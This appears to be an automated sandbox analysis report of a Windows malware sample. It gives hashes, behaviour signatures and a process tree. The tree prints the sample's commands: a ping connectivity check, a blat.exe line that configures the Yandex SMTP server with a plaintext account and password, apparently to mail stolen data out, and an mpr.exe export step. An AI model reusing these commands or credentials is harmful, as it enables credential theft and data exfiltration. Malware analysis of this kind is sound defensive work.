Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240319-en -
resource tags
arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system -
submitted
08-04-2024 01:25
Behavioral task
behavioral1
Sample
e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe
Resource
win7-20240221-en
General
-
Target
e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe
-
Size
1.1MB
-
MD5
e6507f00c8155f6ec0a857d75431801f
-
SHA1
794e6b36e2667a2e81800750ab2126df99b89544
-
SHA256
ab46c89d287660a7cefaa2ab6c9a45b6bc9c3e6acdf56738da9f675e56d3987b
-
SHA512
059de3bf4f9e0451ba44f863950c388126c6df105eadfb87e872ee5fb9e96a5cdf9a8a2c83c57e1db7947f38dc09a0001094e801c61c846c07af7126f2d1acab
-
SSDEEP
24576:7VvsNq/J8UHrzggc4a0ZkR/u2t1sCSSS1HxyifQcLsHBQz:7V3rzgNRokRm6rdQHxLfQcIi
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe -
Executes dropped EXE 2 IoCs
Processes:
blat.exempr.exepid Process 3836 blat.exe 380 mpr.exe -
Processes:
resource yara_rule behavioral2/memory/3968-0-0x0000000000400000-0x0000000000798000-memory.dmp upx behavioral2/memory/3968-27-0x0000000000400000-0x0000000000798000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 21 IoCs
Processes:
mpr.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF} mpr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler" mpr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7BA8.tmp\\mpr.exe" mpr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler\ = "Implements DocHostUIHandler" mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mpf mpr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mpf\ = "mprf" mpr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7BA8.tmp\\mpr.exe \"%1\"" mpr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}" mpr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "mpr.DocHostUIHandler" mpr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7BA8.tmp\\mpr.exe,0" mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32 mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mpr.DocHostUIHandler\Clsid mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell mpr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open mpr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\BrowserFlags = "8" mpr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\EditFlags = "0" mpr.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid Process 664 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
mpr.exedescription pid Process Token: SeDebugPrivilege 380 mpr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
mpr.exepid Process 380 mpr.exe 380 mpr.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.execmd.exedescription pid Process procid_target PID 3968 wrote to memory of 876 3968 e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe 94 PID 3968 wrote to memory of 876 3968 e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe 94 PID 3968 wrote to memory of 876 3968 e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe 94 PID 876 wrote to memory of 756 876 cmd.exe 97 PID 876 wrote to memory of 756 876 cmd.exe 97 PID 876 wrote to memory of 756 876 cmd.exe 97 PID 876 wrote to memory of 3836 876 cmd.exe 106 PID 876 wrote to memory of 3836 876 cmd.exe 106 PID 876 wrote to memory of 3836 876 cmd.exe 106 PID 876 wrote to memory of 380 876 cmd.exe 107 PID 876 wrote to memory of 380 876 cmd.exe 107 PID 876 wrote to memory of 380 876 cmd.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\SysWOW64\PING.EXEping ya.ru -n 53⤵
- Runs ping.exe
PID:756
-
-
C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\blat.exeblat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u donakovi -pw 1546323⤵
- Executes dropped EXE
PID:3836
-
-
C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\mpr.exempr.exe /export3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:380
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1304 --field-trial-handle=2232,i,3915538061666887171,15629965885515244134,262144 --variations-seed-version /prefetch:81⤵PID:1152
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
340B
MD5b484fff9108e34bc60c06be2188ce7f8
SHA14472a8ea5902d5c770e163d8fb3bc781750c11f0
SHA256f9dcaf616357d5f5db051803eedcbfe99bb1e09573e702becaa104cb2207927b
SHA5125efffd0c08a41eb785250463078cbcb575afebd3333a846671f94034042e376ecb9f5d1f7b24052c69345ee3bd79490cb70e0eb3725df72cdcb855c9b1ff1f14
-
Filesize
112KB
MD531f84e433e8d1865e322998a41e6d90e
SHA1cbea6cda10db869636f57b1cffad39b22e6f7f17
SHA256aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e
SHA5127ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9
-
Filesize
3.3MB
MD58dba37604bf06ebcef07dd1085865a6a
SHA11202eb0ea461c502daa7da9d7d75fff226bf57bd
SHA256038ab25642a1220c27028d0b559062b43764c66541ec07a96b2a99d25d9638b0
SHA5120f286677e964d733ea3270f0f196769d8ddddb4a6bb3007187eae56e9abb5e22ee984703df5356b5d9049e5ad3b24c567ae13773684113a4440b2cce5d0132fa
-
Filesize
257B
MD57747daf77047bd41bfe8fe23170c9e70
SHA1916568058d3cd57f4263821c824b72f0aef9b7a6
SHA256b1e4df621dcf3ac9bdcfa4b18ca8f2132e71ac2586bb3df0c52f9993aedd0ee8
SHA5123cd79356260684671a2d51703282bdca3c50b47768c62dd1cf9763f01b74b83cd34380bafd715df0ef05dae06b484041e92f8af99ed50a8eb6361620ea349f5c